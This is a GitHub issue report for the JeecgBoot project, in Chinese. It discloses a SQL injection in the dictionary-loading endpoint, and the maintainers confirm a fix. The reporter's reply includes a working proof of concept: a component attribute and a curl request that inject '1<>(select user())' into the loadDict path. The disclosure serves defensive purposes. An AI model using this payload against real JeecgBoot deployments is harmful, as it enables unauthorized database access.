Skip to content

字典接口存在SQL注入风险 #3713

New issue
New issue
Closed
Closed
字典接口存在SQL注入风险#3713

Activity

zhangdaiscott

zhangdaiscott commented on May 18, 2022

@zhangdaiscott
zhangdaiscott
on May 18, 2022
Member

我们代码加了过滤,你能执行成功?

Nguyendream

Nguyendream commented on May 18, 2022

@Nguyendream
Nguyendream
on May 18, 2022 · edited by Nguyendream
Author

我们代码加了过滤,你能执行成功?

使用以下组件能执行

<j-search-select-tag
  v-model="model.test"
  dict="mysql.user,user,host,1<>(select user())"
  :async="true"
/>

curl执行

curl 'http://localhost:8080/jeecg-boot/sys/dict/loadDict/mysql.user,user,host,1%3C%3E(select%20user())?_t=1652854810&pageSize=10&keyword=' \
  -H 'X-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NTI4NDE5MDIsInVzZXJuYW1lIjoiYWRtaW4ifQ.DdvKu-MOvJyEplEr_QYtGGgBahOKrNUZB89g6L1crqQ' \
  -H 'X-Sign: 1CAA2D41AA8D48D3FC1C72B6968AE09F' \
  -H 'X-TIMESTAMP: 20220518142010' \
  --compressed \
  --insecure
zhangdaiscott

zhangdaiscott commented on May 24, 2022

@zhangdaiscott
zhangdaiscott
on May 24, 2022
Member

已经修复,下个版本发

zhangdaiscott
closed this as completedon May 24, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

      Development

      No branches or pull requests

        Participants

        @zhangdaiscott@Nguyendream

        Issue actions
          字典接口存在SQL注入风险 · Issue #3713 · jeecgboot/JeecgBoot